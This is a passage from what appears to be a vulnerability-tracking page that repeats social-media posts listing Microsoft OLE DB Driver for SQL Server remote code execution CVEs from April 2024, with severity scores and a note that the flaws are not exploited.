  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28936
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28939
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-29047
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
